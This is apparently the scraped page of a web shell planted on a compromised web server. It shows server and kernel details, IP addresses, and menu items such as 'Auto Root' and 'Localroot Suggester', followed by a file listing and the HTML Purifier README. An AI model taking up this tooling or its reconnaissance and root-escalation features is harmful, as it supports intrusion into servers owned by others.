Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.144.95.186
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
vendor /
ezyang /
htmlpurifier /
Delete
Unzip
Name
Size
Permission
Date
Action
library
[ DIR ]
drwxrwxr-x
2022-09-18 07:06
CHANGELOG.md
1.16
KB
-rw-rw-r--
2022-09-18 07:06
CREDITS
341
B
-rw-rw-r--
2022-09-18 07:06
LICENSE
25.84
KB
-rw-rw-r--
2022-09-18 07:06
README.md
1.24
KB
-rw-rw-r--
2022-09-18 07:06
VERSION
6
B
-rw-rw-r--
2022-09-18 07:06
composer.json
1.34
KB
-rw-rw-r--
2022-09-18 07:06
Save
Rename
HTML Purifier [](https://github.com/ezyang/htmlpurifier/actions/workflows/ci.yml) ============= HTML Purifier is an HTML filtering solution that uses a unique combination of robust whitelists and aggressive parsing to ensure that not only are XSS attacks thwarted, but the resulting HTML is standards compliant. HTML Purifier is oriented towards richly formatted documents from untrusted sources that require CSS and a full tag-set. This library can be configured to accept a more restrictive set of tags, but it won't be as efficient as more bare-bones parsers. It will, however, do the job right, which may be more important. Places to go: * See INSTALL for a quick installation guide * See docs/ for developer-oriented documentation, code examples and an in-depth installation guide. * See WYSIWYG for information on editors like TinyMCE and FCKeditor HTML Purifier can be found on the web at: [http://htmlpurifier.org/](http://htmlpurifier.org/) ## Installation Package available on [Composer](https://packagist.org/packages/ezyang/htmlpurifier). If you're using Composer to manage dependencies, you can use $ composer require ezyang/htmlpurifier